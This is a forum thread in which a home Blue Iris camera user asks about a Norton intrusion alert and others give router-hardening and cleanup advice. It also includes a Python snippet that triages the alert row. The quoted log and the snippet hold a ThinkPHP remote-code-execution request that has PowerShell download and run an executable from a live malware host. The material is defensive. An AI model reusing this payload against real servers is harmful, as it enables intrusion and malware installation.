Intrusion Attempt - Firewall question.

John4333

I run Blue Iris on my home computer to monitor 4 home cameras. The system is Windows 10 and we access information remotely on both an iOS and Android device. I use a Google Mesh system for my router.

Lately I have seen increasing intrusion attempts, which appear to be stopped by my Norton Anti-Virus program, which incorporates a firewall. I also run Malwarebytes premium on the computer.

The following is what Norton lists as an Intrusion Attempt. I don't understand it, as it says it originates from my computer. I've obscured my IP information and it is bolded as my computer name, and my internal and external IP addresses.

Can anyone help explain what is happening, and are there other steps I should take to secure my system?

Thanks in advance,
John

Category: Intrusion Prevention
Date & Time,Risk,Activity,Status,Recommended Action,IPS Alert Name,Default Action,Action Taken,Attacking Computer,Attacker URL,Destination Address,Source Address,Traffic Description
3/26/2019 1:07:05 AM,High,An intrusion attempt by MYCOMPUTER was blocked.,Blocked,No Action Required,System Infected: Downloader Download 5,No Action Required,No Action Required,"MYCOMPUTER (MyInternal IP, 8081)","MyExternal IP/public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe /c powershell (new-object System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','C:/Windows/temp/ohjjiyvtnayjtec27467.exe');start C:/Windows/temp/ohjjiyvtnayjtec27467.exe","113.248.157.129, 11839",MYCOMPUTER (MyInternal IP),"TCP, Port 8081"
Network traffic from MyExternal IP/public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe /c powershell (new-object System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','C:/Windows/temp/ohjjiyvtnayjtec27467.exe');start C:/Windows/temp/ohjjiyvtnayjtec27467.exe matches the signature of a known attack. The attack was resulted from \DEVICE\HARDDISKVOLUME6\PROGRAM FILES\BLUE IRIS 4\BLUEIRIS.EXE. To stop being notified for this type of traffic, in the Actions panel, click Stop Notifying Me.
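
An added example, not part of the original post or thread: a short Python triage of a row in the export layout quoted above, pulling out the remote peer, the local port, the command-execution markers in the query string and a defanged payload URL. The sample row is constructed with documentation placeholder addresses, and `listen_ports` (8081 treated as a port this PC serves) is an assumption.

```python
import csv, io, re

# Constructed sample in the column layout of the Norton export quoted above.
# Addresses and the payload host are documentation placeholders, not thread values.
SAMPLE = (
    "Date & Time,Risk,Activity,Status,Recommended Action,IPS Alert Name,"
    "Default Action,Action Taken,Attacking Computer,Attacker URL,"
    "Destination Address,Source Address,Traffic Description\n"
    "3/26/2019 1:07:05 AM,High,An intrusion attempt by MYCOMPUTER was blocked.,"
    "Blocked,No Action Required,System Infected: Downloader Download 5,"
    'No Action Required,No Action Required,"MYCOMPUTER (192.168.1.10, 8081)",'
    '"198.51.100.20/public/index.php?s=index/think\\app/invokefunction'
    "&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe /c powershell "
    "(new-object System.Net.WebClient).DownloadFile('http://payload.example/download.exe',"
    "'C:/Windows/temp/x.exe');start C:/Windows/temp/x.exe\","
    '"203.0.113.7, 11839",MYCOMPUTER (192.168.1.10),"TCP, Port 8081"\n'
)

# Strings typical of a web request that tries to run a command and fetch a file.
MARKERS = ("invokefunction", "call_user_func_array", "vars[0]=system",
           "powershell", "downloadfile(")

def defang(url):
    """Make a URL safe to paste into a report or a search box."""
    return url.replace("http", "hxxp", 1).replace(".", "[.]")

def triage(row, listen_ports=frozenset({8081})):
    """Summarise one IPS row. listen_ports is an assumption: ports this PC serves."""
    peer_ip, peer_port = (p.strip() for p in row["Destination Address"].split(","))
    local_port = int(re.search(r"Port (\d+)", row["Traffic Description"]).group(1))
    host, _, rest = row["Attacker URL"].partition("/")
    path, _, query = rest.partition("?")
    return {
        "remote_peer": peer_ip,
        "local_port": local_port,
        "requested": f"{host}/{path}",
        # Heuristic: a high remote port talking to a port we listen on means the
        # remote side is the client, so the request arrived from outside.
        "inbound_to_exposed_service": local_port in listen_ports and int(peer_port) > 1023,
        "exec_markers": [m for m in MARKERS if m in query.lower()],
        "payload_urls": [defang(u) for u in re.findall(r"https?://[^'\"\s)]+", query)],
    }

def triage_export(text):
    """Parse a whole CSV export (quoted fields contain commas) and triage each row."""
    return [triage(r) for r in csv.DictReader(io.StringIO(text))]

if __name__ == "__main__":
    for finding in triage_export(SAMPLE):
        print(finding)
```
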
 

SouthernYankee

If set correctly you should not be getting internal attacks.
What is your internet router, make and model?
What ports are open on your router?
Do you have UPnP enabled on the router, cameras?
Do you access Blue Iris externally from your home network? If so, how? Be very detailed.
 

catcamstar

Since 10/3/2019, that particular site (hognoob.se) has served malware attacks (source: URLhaus | http://fid.hognoob.se/download.exe)

In addition to what @SouthernYankee wrote to secure your router (disable port forwards/UPnP etc.): go into lockdown mode. If I were you and saw such "attacks", I'd format the PC right away, reinstall Windows 10, update all, install BI and do NOT (ab)use that PC for anything else. Do not install grey zone games/software nor watch nature documentaries.

Hope this helps!
CC
 

davej

You might consider taking the files that are mentioned in the report and uploading them to Virustotal.
 